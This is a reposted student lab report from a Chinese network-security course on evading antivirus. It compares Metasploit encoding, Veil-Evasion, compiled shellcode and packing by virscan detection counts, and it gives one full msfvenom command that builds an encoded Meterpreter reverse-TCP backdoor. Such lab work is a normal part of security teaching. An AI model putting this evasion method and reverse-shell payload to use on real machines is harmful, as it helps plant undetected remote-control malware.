码迷,mamicode.com
首页 > 其他好文 > 详细

20155218《网络对抗》Exp3 免杀原理与实践

时间:2018-04-08 19:48:56      阅读:191      评论:0      收藏:0      [点我收藏+]

标签:shell   查看   err   reverse   msfvenom   软件加壳   code   tcp   window   

20155218《网络对抗》Exp3 免杀原理与实践

一、使用msf生成后门程序的检测

(1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下:

技术分享图片

(2)使用msf时对它多编码1次并进行测试

技术分享图片
技术分享图片
发现能发现的杀软变少;

(3)使用msf时对它多编码10次并进行测试

技术分享图片

技术分享图片

编码10次后,发现可以查杀的杀软数量仅仅减少了一个;

二、使用veil-evasion生成后门程序的检测

通过list查看功能,选用22命令技术分享图片

生成文件:技术分享图片
测试结果:技术分享图片
显而易见,效果并不理想;

三、利用shellcode编写后门程序的检测

  • 使用msf生成一个shellcode;然后运行vs2017生成.exe文件,可见再生成后立刻被360发现;
    技术分享图片
  • 经过virscan被5个AV扫描出,效果不理想;
    技术分享图片

    尝试新的方法:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai x86/bloxer -i 10 LHOST=192.168.1.104 LPORT=4433 -f c

    技术分享图片
    只有两个AV可以查杀,免杀效果不错;
    并成功实现回连;技术分享图片

四、软件加壳:

技术分享图片
软件加壳的效果并不好;

五、遇到的问题:

  1. 技术分享图片

解决方法:找到错误信息的最后一个文件名,vi编译, 把出错的这行注释(加#)就可以了;

  1. 使用代理安装的,有些包会下载安装失败,可以提前安装,记录下基本过程: veil的包安装

20155218《网络对抗》Exp3 免杀原理与实践

标签:shell   查看   err   reverse   msfvenom   软件加壳   code   tcp   window   

原文地址:https://www.cnblogs.com/xzh1996/p/8723601.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!